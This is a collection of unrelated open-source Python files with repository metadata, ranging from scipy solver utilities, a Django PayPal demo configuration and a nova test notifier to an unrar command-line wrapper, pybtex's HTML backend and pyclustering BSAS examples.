        b = b.astype('d') # upcast non-FP types to double
    def postprocess(x):
        # Restore the caller's container type/shape (e.g. (N,1) matrix).
        if isinstance(b,matrix):
            x = asmatrix(x)
        return x.reshape(b.shape)
    # Determine the solution dtype: A's dtype if available, otherwise probe
    # it with a matvec; then promote together with b's dtype.
    if hasattr(A,'dtype'):
        xtype = A.dtype.char
    else:
        xtype = A.matvec(b).dtype.char
    xtype = coerce(xtype, b.dtype.char)
    b = asarray(b,dtype=xtype)  # make b the same type as x
    b = b.ravel()
    if x0 is None:
        x = zeros(N, dtype=xtype)
    else:
        x = array(x0, dtype=xtype)
        if not (x.shape == (N,1) or x.shape == (N,)):
            raise ValueError('A and x have incompatible dimensions')
        x = x.ravel()
    # process preconditioner
    if M is None:
        # No explicit preconditioner: fall back to the operator's own
        # psolve/rpsolve hooks if present, otherwise the identity.
        if hasattr(A_,'psolve'):
            psolve = A_.psolve
        else:
            psolve = id
        if hasattr(A_,'rpsolve'):
            rpsolve = A_.rpsolve
        else:
            rpsolve = id
        if psolve is id and rpsolve is id:
            M = IdentityOperator(shape=A.shape, dtype=A.dtype)
        else:
            M = LinearOperator(A.shape, matvec=psolve, rmatvec=rpsolve,
                               dtype=A.dtype)
    else:
        M = aslinearoperator(M)
        if A.shape != M.shape:
            raise ValueError('matrix and preconditioner have different shapes')
    return A, M, x, b, postprocess
|
Eric89GXL/scipy
|
scipy/sparse/linalg/isolve/utils.py
|
Python
|
bsd-3-clause
| 3,337
|
"""
Django settings for paypal_demo project.
Generated by 'django-admin startproject' using Django 1.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'gt^xy(p!5wcff5@zy#^cnvuz9ry#-#g$59du41x@a!l=#)3q6+'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'paypal_demo',
]
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'paypal_demo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'paypal_demo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
# PayPal settings (django-paypal): enable Instant Payment Notification (IPN)
# support and set the sandbox account that receives payments.
INSTALLED_APPS.append('paypal.standard.ipn')
PAYPAL_RECEIVER_EMAIL = "sandbox@neutrondrive.com"
|
pizzapanther/Getting-Paid-With-Python
|
paypal_demo/paypal_demo/settings.py
|
Python
|
mit
| 2,758
|
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import functools
import threading
import oslo_messaging as messaging
from oslo_serialization import jsonutils
from nova import rpc
SUBSCRIBERS = collections.defaultdict(threading.Event)
NOTIFICATIONS = []
VERSIONED_NOTIFICATIONS = []
def reset():
    """Reset the module-level notification state between tests."""
    # Empty the lists in place so existing references to them stay valid.
    del NOTIFICATIONS[:]
    del VERSIONED_NOTIFICATIONS[:]
    SUBSCRIBERS.clear()
# Lightweight record of a single emitted (unversioned) notification.
FakeMessage = collections.namedtuple('Message',
                                     ['publisher_id', 'priority',
                                      'event_type', 'payload', 'context'])
class FakeNotifier(object):
    """Test double for an oslo.messaging notifier that records legacy
    (unversioned) notifications in the module-level NOTIFICATIONS list
    instead of sending them over a transport."""

    def __init__(self, transport, publisher_id, serializer=None):
        self.transport = transport
        self.publisher_id = publisher_id
        self._serializer = serializer or messaging.serializer.NoOpSerializer()
        # Expose one bound method per priority, e.g.
        # notifier.info(ctxt, event_type, payload).
        for level in ('debug', 'info', 'warn', 'error', 'critical'):
            handler = functools.partial(self._notify, level.upper())
            setattr(self, level, handler)

    def prepare(self, publisher_id=None):
        """Return a new notifier of the same class, optionally re-branded
        with a different publisher id."""
        effective_id = self.publisher_id if publisher_id is None else publisher_id
        return self.__class__(self.transport, effective_id,
                              serializer=self._serializer)

    def _notify(self, priority, ctxt, event_type, payload):
        serialized = self._serializer.serialize_entity(ctxt, payload)
        # NOTE(sileht): simulate the kombu serializer
        # this permit to raise an exception if something have not
        # been serialized correctly
        jsonutils.to_primitive(serialized)
        # NOTE(melwitt): Try to serialize the context, as the rpc would.
        # An exception will be raised if something is wrong
        # with the context.
        self._serializer.serialize_context(ctxt)
        NOTIFICATIONS.append(FakeMessage(self.publisher_id, priority,
                                         event_type, serialized, ctxt))

    def is_enabled(self):
        return True
class FakeVersionedNotifier(FakeNotifier):
    """Variant of FakeNotifier that records versioned notifications as
    dicts and wakes any test waiting on that notification's event type."""

    def _notify(self, priority, ctxt, event_type, payload):
        notification = {
            'publisher_id': self.publisher_id,
            'priority': priority,
            'event_type': event_type,
            'payload': self._serializer.serialize_entity(ctxt, payload),
        }
        VERSIONED_NOTIFICATIONS.append(notification)
        _notify_subscribers(notification)
def stub_notifier(test):
    """Replace nova's notifiers with the fakes for the given test case.

    Stubs the oslo_messaging.Notifier class globally and, if nova.rpc has
    already been initialized, swaps the live LEGACY_NOTIFIER/NOTIFIER
    instances for fakes that reuse the originals' transport, publisher id
    and serializer.
    """
    test.stub_out('oslo_messaging.Notifier', FakeNotifier)
    if rpc.LEGACY_NOTIFIER and rpc.NOTIFIER:
        test.stub_out('nova.rpc.LEGACY_NOTIFIER',
                      FakeNotifier(rpc.LEGACY_NOTIFIER.transport,
                                   rpc.LEGACY_NOTIFIER.publisher_id,
                                   serializer=getattr(rpc.LEGACY_NOTIFIER,
                                                      '_serializer',
                                                      None)))
        test.stub_out('nova.rpc.NOTIFIER',
                      FakeVersionedNotifier(rpc.NOTIFIER.transport,
                                            rpc.NOTIFIER.publisher_id,
                                            serializer=getattr(rpc.NOTIFIER,
                                                               '_serializer',
                                                               None)))
def wait_for_versioned_notification(event_type, timeout=1.0):
    """Block until a versioned notification of *event_type* has been sent.

    Returns True if the notification arrived within *timeout* seconds,
    False otherwise.
    """
    # NOTE: The event stored in SUBSCRIBERS is not used for synchronizing
    # the access to shared state as there is no parallel access to
    # SUBSCRIBERS because the only parallelism is due to eventlet.
    # The event is simply used to avoid polling the list of received
    # notifications
    return SUBSCRIBERS[event_type].wait(timeout)
def _notify_subscribers(notification):
    # Wake any waiter blocked in wait_for_versioned_notification().
    SUBSCRIBERS[notification['event_type']].set()
|
rajalokan/nova
|
nova/tests/unit/fake_notifier.py
|
Python
|
apache-2.0
| 4,395
|
#!/usr/bin/env python
from pyfi.calendar.calendar.object import Calendar
__all__ = ['Calendar']
|
rlinguri/pyfi
|
pyfi/calendar/calendar/__init__.py
|
Python
|
mit
| 98
|
from django import forms
from connect.accounts.models import Role, Skill
class FilterMemberForm(forms.Form):
    """
    Form for searching for members by their skills and roles.
    """
    # Both filters are optional checkbox groups; leaving a group empty
    # means "do not filter on this field".
    skills = forms.ModelMultipleChoiceField(
        queryset=Skill.objects.all(),
        widget=forms.CheckboxSelectMultiple(),
        required=False)

    roles = forms.ModelMultipleChoiceField(
        queryset=Role.objects.all(),
        widget=forms.CheckboxSelectMultiple(),
        required=False)
|
nlhkabu/connect
|
connect/discover/forms.py
|
Python
|
bsd-3-clause
| 497
|
# Decompiled module: toontown.coghq.CashbotMintGearRoom_Battle01_Cogs
from panda3d.core import Point3
from SpecImports import *
from toontown.toonbase import ToontownGlobals
CogParent = 10000
BattleCellId = 0
BattleCells = {BattleCellId: {'parentEntId': CogParent,
'pos': Point3(0, 0, 0)}}
CogData = [{'parentEntId': CogParent,
'boss': 1,
'level': ToontownGlobals.CashbotMintBossLevel,
'battleCell': BattleCellId,
'pos': Point3(-6, 0, 0),
'h': 180,
'behavior': 'stand',
'path': None,
'skeleton': 1},
{'parentEntId': CogParent,
'boss': 0,
'level': ToontownGlobals.CashbotMintCogLevel + 1,
'battleCell': BattleCellId,
'pos': Point3(-2, 0, 0),
'h': 180,
'behavior': 'stand',
'path': None,
'skeleton': 0},
{'parentEntId': CogParent,
'boss': 0,
'level': ToontownGlobals.CashbotMintCogLevel + 1,
'battleCell': BattleCellId,
'pos': Point3(2, 0, 0),
'h': 180,
'behavior': 'stand',
'path': None,
'skeleton': 0},
{'parentEntId': CogParent,
'boss': 0,
'level': ToontownGlobals.CashbotMintCogLevel + 1,
'battleCell': BattleCellId,
'pos': Point3(6, 0, 0),
'h': 180,
'behavior': 'stand',
'path': None,
'skeleton': 0}]
ReserveCogData = []
|
DedMemez/ODS-August-2017
|
coghq/CashbotMintGearRoom_Battle01_Cogs.py
|
Python
|
apache-2.0
| 1,288
|
# Copyright (c) 2003-2005 Jimmy Retzlaff, 2008 Konstantin Yegupov
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Unix version uses unrar command line executable
import subprocess
import gc
import os, os.path
import time, re
from rar_exceptions import *
# Raised when neither 'unrar' nor 'rar' can be found on the PATH.
class UnpackerNotInstalled(Exception): pass
# Cached name of the working executable and the detected RAR major version.
rar_executable_cached = None
rar_executable_version = None
def call_unrar(params):
    """Call the rar/unrar command line executable with ``params`` (a list).

    Returns the ``subprocess.Popen`` object with stdout and stderr piped.
    Raises UnpackerNotInstalled when no rar/unrar binary is on the PATH.
    """
    global rar_executable_cached
    if rar_executable_cached is None:
        # Probe for a working executable once and cache the result.
        for command in ('unrar', 'rar'):
            try:
                probe = subprocess.Popen([command], stdout=subprocess.PIPE,
                                         stderr=subprocess.PIPE)
                # BUGFIX: reap the probe process; the original never waited
                # on it, leaving a zombie child and open pipe handles.
                probe.communicate()
                rar_executable_cached = command
                break
            except OSError:
                pass
        if rar_executable_cached is None:
            raise UnpackerNotInstalled("No suitable RAR unpacker installed")
    assert type(params) == list, "params must be list"
    args = [rar_executable_cached] + params
    try:
        gc.disable() # See http://bugs.python.org/issue1336
        return subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    finally:
        gc.enable()
class RarFileImplementation(object):
    """Unix RAR archive reader that shells out to the rar/unrar CLI.

    NOTE(review): this is Python 2 code (``iterator.next()``, ``unicode``);
    it scrapes unrar's human-readable output, so behavior depends on the
    exact (English) output format of unrar 4.x / 5.x.
    """
    def init(self, password=None):
        """Open the archive: detect the unrar version and read the comment."""
        global rar_executable_version
        self.password = password
        # 'v' (verbose listing) output carries the version banner + comment.
        proc = self.call('v', [])
        stdoutdata, stderrdata = proc.communicate()
        # Use unrar return code if available
        self._check_returncode(proc.returncode)
        for line in stderrdata.splitlines():
            if line.strip().startswith("Cannot open"):
                raise FileOpenError
            if line.find("CRC failed")>=0:
                raise IncorrectRARPassword
        accum = []
        source = iter(stdoutdata.splitlines())
        line = ''
        # Skip everything before the "RAR x.yy" banner line.
        while (line.find('RAR ') == -1):
            line = source.next()
        signature = line
        # The code below is mighty flaky
        # and will probably crash on localized versions of RAR
        # but I see no safe way to rewrite it using a CLI tool
        if signature.find("RAR 4") > -1:
            rar_executable_version = 4
            # RAR 4: comment lines sit between "Comment:" and
            # "Pathname/Comment" headers.
            while not (line.startswith('Comment:') or line.startswith('Pathname/Comment')):
                if line.strip().endswith('is not RAR archive'):
                    raise InvalidRARArchive
                line = source.next()
            while not line.startswith('Pathname/Comment'):
                accum.append(line.rstrip('\n'))
                line = source.next()
            if len(accum):
                accum[0] = accum[0][9:] # strip out "Comment:" part
                self.comment = '\n'.join(accum[:-1])
            else:
                self.comment = None
        elif signature.find("RAR 5") > -1:
            rar_executable_version = 5
            line = source.next()
            # RAR 5: comment lines appear before the "Archive:" header.
            while not line.startswith('Archive:'):
                if line.strip().endswith('is not RAR archive'):
                    raise InvalidRARArchive
                accum.append(line.rstrip('\n'))
                line = source.next()
            if len(accum):
                self.comment = '\n'.join(accum[:-1]).strip()
            else:
                self.comment = None
        else:
            raise UnpackerNotInstalled("Unsupported RAR version, expected 4.x or 5.x, found: "
                + signature.split(" ")[1])
    def escaped_password(self):
        # '-' means "no password" on the unrar command line.
        return '-' if self.password == None else self.password
    def call(self, cmd, options=[], files=[]):
        """Run unrar command ``cmd`` on this archive; return the Popen.

        NOTE(review): the mutable default args are never mutated here, so
        the shared-default pitfall does not bite in this code as written.
        """
        options2 = options + ['p'+self.escaped_password()]
        soptions = ['-'+x for x in options2]
        return call_unrar([cmd]+soptions+['--',self.archiveName]+files)
    def infoiter(self):
        """Yield one metadata dict per archive member with keys: index,
        filename, size, isdir, datetime, comment, volume."""
        command = "v" if rar_executable_version == 4 else "l"
        proc = self.call(command, ['c-'])
        stdoutdata, stderrdata = proc.communicate()
        # Use unrar return code if available
        self._check_returncode(proc.returncode)
        for line in stderrdata.splitlines():
            if line.strip().startswith("Cannot open"):
                raise FileOpenError
        accum = []
        source = iter(stdoutdata.splitlines())
        line = ''
        # The listing body is delimited by '-----------' separator rows.
        while not line.startswith('-----------'):
            if line.strip().endswith('is not RAR archive'):
                raise InvalidRARArchive
            if line.startswith("CRC failed") or line.startswith("Checksum error") or line.startswith("checksum error"):
                raise IncorrectRARPassword
            line = source.next()
        line = source.next()
        i = 0
        re_spaces = re.compile(r"\s+")
        if rar_executable_version == 4:
            # RAR 4 prints each entry on two lines: filename, then details.
            while not line.startswith('-----------'):
                accum.append(line)
                if len(accum)==2:
                    data = {}
                    data['index'] = i
                    # asterisks mark password-encrypted files
                    data['filename'] = accum[0].strip().lstrip("*") # asterisks marks password-encrypted files
                    fields = re_spaces.split(accum[1].strip())
                    data['size'] = int(fields[0])
                    attr = fields[5]
                    data['isdir'] = 'd' in attr.lower()
                    data['datetime'] = time.strptime(fields[3]+" "+fields[4], '%d-%m-%y %H:%M')
                    data['comment'] = None
                    data['volume'] = None
                    yield data
                    accum = []
                    i += 1
                line = source.next()
        elif rar_executable_version == 5:
            # RAR 5 prints one entry per line: attrs size date time name.
            while not line.startswith('-----------'):
                fields = line.strip().lstrip("*").split()
                data = {}
                data['index'] = i
                # Re-join trailing fields: filenames may contain spaces.
                data['filename'] = " ".join(fields[4:])
                data['size'] = int(fields[1])
                attr = fields[0]
                data['isdir'] = 'd' in attr.lower()
                data['datetime'] = time.strptime(fields[2]+" "+fields[3], '%d-%m-%y %H:%M')
                data['comment'] = None
                data['volume'] = None
                yield data
                i += 1
                line = source.next()
    def read_files(self, checker):
        """Return [(info, bytes)] for every non-directory member accepted by
        ``checker`` — the whole file content is read into memory."""
        res = []
        for info in self.infoiter():
            checkres = checker(info)
            if checkres==True and not info.isdir:
                # 'p' prints the file to stdout; 'inul' suppresses messages.
                pipe = self.call('p', ['inul'], [info.filename]).stdout
                res.append((info, pipe.read()))
        return res
    def extract(self, checker, path, withSubpath, overwrite):
        """Extract members accepted by ``checker`` into ``path``.

        withSubpath=False flattens directory structure ('e' vs 'x');
        overwrite selects the o+/o- unrar switch. Returns the info list.
        """
        res = []
        command = 'x'
        if not withSubpath:
            command = 'e'
        options = []
        if overwrite:
            options.append('o+')
        else:
            options.append('o-')
        # unrar treats a trailing separator as "destination directory".
        if not path.endswith(os.sep):
            path += os.sep
        names = []
        for info in self.infoiter():
            checkres = checker(info)
            if type(checkres) in [str, unicode]:
                raise NotImplementedError("Condition callbacks returning strings are deprecated and only supported in Windows")
            if checkres==True and not info.isdir:
                names.append(info.filename)
                res.append(info)
        names.append(path)
        proc = self.call(command, options, names)
        stdoutdata, stderrdata = proc.communicate()
        # Use unrar return code if available
        self._check_returncode(proc.returncode)
        if stderrdata.find("CRC failed")>=0 or stderrdata.find("Checksum error")>=0 or stderrdata.find("checksum error")>=0:
            raise CRCRARError
        if stderrdata.find("No files to extract")>=0:
            raise NoFileToExtract
        if stderrdata.find("Bad archive")>=0:
            raise FatalRARError
        return res
    def _check_returncode(self, returncode):
        """Map unrar's documented exit codes onto this module's exceptions."""
        # RAR exit code from unrarsrc-5.2.1.tar.gz/errhnd.hpp
        RARX_SUCCESS = 0
        RARX_WARNING = 1
        RARX_FATAL = 2
        RARX_CRC = 3
        RARX_LOCK = 4
        RARX_WRITE = 5
        RARX_OPEN = 6
        RARX_USERERROR = 7
        RARX_MEMORY = 8
        RARX_CREATE = 9
        RARX_NOFILES = 10
        RARX_BADPWD = 11
        RARX_USERBREAK = 255
        if returncode != RARX_SUCCESS:
            if returncode == RARX_FATAL:
                raise FatalRARError
            elif returncode == RARX_CRC:
                raise CRCRARError
            elif returncode == RARX_BADPWD:
                raise IncorrectRARPassword
            elif returncode == RARX_NOFILES:
                raise NoFileToExtract
            else:
                # Any other non-zero code (warning, lock, memory, ...)
                raise GenericRARError
    def destruct(self):
        # Nothing to clean up: no persistent handles are held.
        pass
    def get_volume(self):
        """Return the zero-based volume number of this archive part, or
        None when the archive is not part of a multi-volume set."""
        command = "v" if rar_executable_version == 4 else "l"
        stdoutdata, stderrdata = self.call(command, ['c-']).communicate()
        for line in stderrdata.splitlines():
            if line.strip().startswith("Cannot open"):
                raise FileOpenError
        source = iter(stdoutdata.splitlines())
        line = ''
        while not line.startswith('-----------'):
            if line.strip().endswith('is not RAR archive'):
                raise InvalidRARArchive
            if line.startswith("CRC failed") or line.startswith("Checksum error"):
                raise IncorrectRARPassword
            line = source.next()
        line = source.next()
        if rar_executable_version == 4:
            # Skip past the listing body; the summary line follows the
            # closing '-----------' row.
            while not line.startswith('-----------'):
                line = source.next()
            line = source.next()
            items = line.strip().split()
            if len(items)>4 and items[4]=="volume":
                return int(items[5]) - 1
            else:
                return None
        elif rar_executable_version == 5:
            while not line.startswith('-----------'):
                line = source.next()
            line = source.next()
            items = line.strip().split()
            if items[1]=="volume":
                return int(items[2]) - 1
            else:
                return None
|
keen99/SickRage
|
lib/unrar2/unix.py
|
Python
|
gpl-3.0
| 11,433
|
"""Localizations for meas_date extraction."""
# Authors: Eric Larson <larson.eric.d@gmail.com>
#
# License: BSD-3-Clause
# This file was generated on 2021/01/31 on an Ubuntu system.
# When getting "unsupported locale setting" on Ubuntu (e.g., with localepurge),
# use "sudo locale-gen de_DE" etc. then "sudo update-locale".
"""
import datetime
import locale
print('_localized_abbr = {')
for loc in ('en_US.utf8', 'de_DE', 'fr_FR', 'it_IT'):
print(f' {repr(loc)}: {{')
print(' "month": {', end='')
month_abbr = set()
for month in range(1, 13): # Month as locale’s abbreviated name
locale.setlocale(locale.LC_TIME, "en_US.utf8")
dt = datetime.datetime(year=2000, month=month, day=1)
val = dt.strftime("%b").lower()
locale.setlocale(locale.LC_TIME, loc)
key = dt.strftime("%b").lower()
month_abbr.add(key)
print(f'{repr(key)}: {repr(val)}, ', end='')
print('}, # noqa')
print(' "weekday": {', end='')
weekday_abbr = set()
for day in range(1, 8): # Weekday as locale’s abbreviated name.
locale.setlocale(locale.LC_TIME, "en_US.utf8")
dt = datetime.datetime(year=2000, month=1, day=day)
val = dt.strftime("%a").lower()
locale.setlocale(locale.LC_TIME, loc)
key = dt.strftime("%a").lower()
assert key not in weekday_abbr, key
weekday_abbr.add(key)
print(f'{repr(key)}: {repr(val)}, ', end='')
print('}, # noqa')
print(' },')
print('}\n')
"""
# Mapping: locale -> {"month" | "weekday" -> {localized abbr -> English abbr}}.
# Produced by the generator script kept in the string literal above; edit
# the generator and regenerate rather than hand-editing these tables.
_localized_abbr = {
    'en_US.utf8': {
        "month": {'jan': 'jan', 'feb': 'feb', 'mar': 'mar', 'apr': 'apr', 'may': 'may', 'jun': 'jun', 'jul': 'jul', 'aug': 'aug', 'sep': 'sep', 'oct': 'oct', 'nov': 'nov', 'dec': 'dec', },  # noqa
        "weekday": {'sat': 'sat', 'sun': 'sun', 'mon': 'mon', 'tue': 'tue', 'wed': 'wed', 'thu': 'thu', 'fri': 'fri', },  # noqa
    },
    'de_DE': {
        "month": {'jan': 'jan', 'feb': 'feb', 'mär': 'mar', 'apr': 'apr', 'mai': 'may', 'jun': 'jun', 'jul': 'jul', 'aug': 'aug', 'sep': 'sep', 'okt': 'oct', 'nov': 'nov', 'dez': 'dec', },  # noqa
        "weekday": {'sa': 'sat', 'so': 'sun', 'mo': 'mon', 'di': 'tue', 'mi': 'wed', 'do': 'thu', 'fr': 'fri', },  # noqa
    },
    'fr_FR': {
        "month": {'janv.': 'jan', 'févr.': 'feb', 'mars': 'mar', 'avril': 'apr', 'mai': 'may', 'juin': 'jun', 'juil.': 'jul', 'août': 'aug', 'sept.': 'sep', 'oct.': 'oct', 'nov.': 'nov', 'déc.': 'dec', },  # noqa
        "weekday": {'sam.': 'sat', 'dim.': 'sun', 'lun.': 'mon', 'mar.': 'tue', 'mer.': 'wed', 'jeu.': 'thu', 'ven.': 'fri', },  # noqa
    },
    'it_IT': {
        "month": {'gen': 'jan', 'feb': 'feb', 'mar': 'mar', 'apr': 'apr', 'mag': 'may', 'giu': 'jun', 'lug': 'jul', 'ago': 'aug', 'set': 'sep', 'ott': 'oct', 'nov': 'nov', 'dic': 'dec', },  # noqa
        "weekday": {'sab': 'sat', 'dom': 'sun', 'lun': 'mon', 'mar': 'tue', 'mer': 'wed', 'gio': 'thu', 'ven': 'fri', },  # noqa
    },
}
|
wmvanvliet/mne-python
|
mne/io/nirx/_localized_abbr.py
|
Python
|
bsd-3-clause
| 2,966
|
# Copyright (c) 2008, 2009, 2010, 2011 Andrey Golovizin
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from xml.sax.saxutils import escape
from pybtex.backends import BaseBackend
import pybtex.io
file_extension = 'html'
# HTML skeleton written before the first entry; the '%s' placeholder is
# filled with the output character encoding in write_prologue().
PROLOGUE = u"""<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head><meta name="generator" content="Pybtex">
<meta http-equiv="Content-Type" content="text/html; charset=%s">
<title>Bibliography</title>
</head>
<body>
<dl>
"""
class Backend(BaseBackend):
    """HTML output backend: renders a bibliography as a <dl> list."""
    name = 'html'
    suffixes = '.html',
    # LaTeX-ish symbol names mapped to their HTML/Unicode equivalents.
    symbols = {
        'ndash': u'–',
        'newblock': u'\n',
        'nbsp': u' '
    }
    # Rich-text tag names mapped to the HTML element used to render them.
    tags = {
        'emph': u'em',
    }
    def format_text(self, text):
        # Escape &, < and > so arbitrary text is safe inside HTML.
        return escape(text)
    def format_tag(self, tag_name, text):
        """Wrap ``text`` in the HTML element registered for ``tag_name``."""
        tag = self.tags[tag_name]
        # BUGFIX: was a ``ur'...'`` literal — a syntax error on Python 3;
        # the raw prefix was pointless anyway (no backslashes in the string).
        return u'<%s>%s</%s>' % (tag, text, tag)
    def write_prologue(self, maxlen):
        # ``maxlen`` is part of the backend interface but unused for HTML.
        encoding = self.encoding or pybtex.io.get_default_encoding()
        self.output(PROLOGUE % encoding)
    def write_epilogue(self):
        self.output(u'</dl></body></html>\n')
    def write_entry(self, key, label, text):
        # ``key`` is unused; an HTML entry shows only its label and text.
        self.output(u'<dt>%s</dt>\n' % label)
        self.output(u'<dd>%s</dd>\n' % text)
|
rybesh/pybtex
|
pybtex/backends/html.py
|
Python
|
mit
| 2,255
|
"""!
@brief Examples of usage and demonstration of abilities of BSAS algorithm in cluster analysis.
@authors Andrei Novikov (pyclustering@yandex.ru)
@date 2014-2020
@copyright BSD-3-Clause
"""
from pyclustering.cluster import cluster_visualizer;
from pyclustering.cluster.bsas import bsas, bsas_visualizer;
from pyclustering.samples.definitions import SIMPLE_SAMPLES;
from pyclustering.utils import read_sample;
from pyclustering.utils.metric import distance_metric, type_metric;
def template_clustering(path, amount, threshold, **kwargs):
    """Read a sample from ``path``, run BSAS clustering, optionally draw it.

    Keyword args: ``metric`` (default squared Euclidean), ``ccore``
    (default False — use the C++ core), ``draw`` (default True).
    """
    # Idiom cleanup: removed the spurious C-style trailing semicolons.
    metric = kwargs.get('metric', distance_metric(type_metric.EUCLIDEAN_SQUARE))
    ccore = kwargs.get('ccore', False)
    draw = kwargs.get('draw', True)
    sample = read_sample(path)
    print("Sample: ", path)
    bsas_instance = bsas(sample, amount, threshold, ccore=ccore, metric=metric)
    bsas_instance.process()
    clusters = bsas_instance.get_clusters()
    representatives = bsas_instance.get_representatives()
    if draw is True:
        bsas_visualizer.show_clusters(sample, clusters, representatives)
# Per-sample demo wrappers: (sample, max clusters, threshold).
# Idiom cleanup: removed the spurious C-style trailing semicolons.
def cluster_sample1():
    template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0)
def cluster_sample2():
    template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, 1.0)
def cluster_sample3():
    template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4, 1.0)
def cluster_sample4():
    template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE4, 5, 1.0)
def cluster_sample5():
    template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE5, 4, 1.0)
def cluster_sample6():
    template_clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE6, 2, 1.0)
def cluster_elongate():
    template_clustering(SIMPLE_SAMPLES.SAMPLE_ELONGATE, 2, 1.0)
# Run every demo when the module is executed/imported (original behavior).
cluster_sample1()
cluster_sample2()
cluster_sample3()
cluster_sample4()
cluster_sample5()
cluster_sample6()
cluster_elongate()
|
annoviko/pyclustering
|
pyclustering/cluster/examples/bsas_examples.py
|
Python
|
gpl-3.0
| 1,836
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-07-11 18:40
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Add nullable primary_ip4/primary_ip6 one-to-one links from Device to
    ipam.IPAddress; deleting the address nulls the link (SET_NULL)."""
    dependencies = [
        ('ipam', '0001_initial'),
        ('dcim', '0005_auto_20160706_1722'),
    ]
    operations = [
        migrations.AddField(
            model_name='device',
            name='primary_ip4',
            field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='primary_ip4_for', to='ipam.IPAddress', verbose_name=b'Primary IPv4'),
        ),
        migrations.AddField(
            model_name='device',
            name='primary_ip6',
            field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='primary_ip6_for', to='ipam.IPAddress', verbose_name=b'Primary IPv6'),
        ),
    ]
|
